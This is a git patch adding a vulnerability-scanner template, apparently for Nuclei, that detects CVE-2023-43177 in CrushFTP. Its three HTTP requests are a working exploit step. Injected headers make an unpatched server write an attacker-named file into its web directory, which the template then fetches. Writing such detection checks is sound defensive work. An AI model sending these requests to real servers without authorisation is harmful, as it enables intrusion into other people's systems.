From 5e01220d71c3f5eb0fb1ca777e516d5755b79a52 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 12 Dec 2023 14:43:40 +0530 Subject: [PATCH] Added CVE-2023-43177 (CrushFTP < 10.5.1 RCE) (#8802) * Added CVE-2023-43177 * misc update --- http/cves/2023/CVE-2023-43177.yaml | 72 ++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43177.yaml diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml new file mode 100644 index 0000000000..2696f1e412 --- /dev/null +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -0,0 +1,72 @@ +id: CVE-2023-43177 + +info: + name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-43177 + - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ + - https://blog.projectdiscovery.io/crushftp-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-43177 + cwe-id: CWE-913 + epss-score: 0.00106 + epss-percentile: 0.42673 + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: crushftp + product: crushftp + tags: cve,cve2023,crushftp,unauth,rce + +flow: http(1) && http(2) && http(3) + +variables: + dirname: "{{randbase(5)}}" + filename: "{{randbase(5)}}" + +http: + - method: GET + path: + - "{{BaseURL}}/WebInterface" + + matchers: + - type: dsl + dsl: + - contains_all(to_lower(header), "currentauth", "crushauth") + + - method: POST + path: + - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}" + + headers: + Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}" + as2-to: X + user_name: crushadmin{{dirname}} + user_log_path: "./WebInterface/{{dirname}}/" + user_log_file: "{{filename}}" + Content-Type: application/x-www-form-urlencoded + + body: | + post=body + + matchers: + - type: regex + regex: + - "crushadmin" + + - method: GET + path: + - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}" + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, "crushadmin{{dirname}}") + condition: and \ No newline at end of file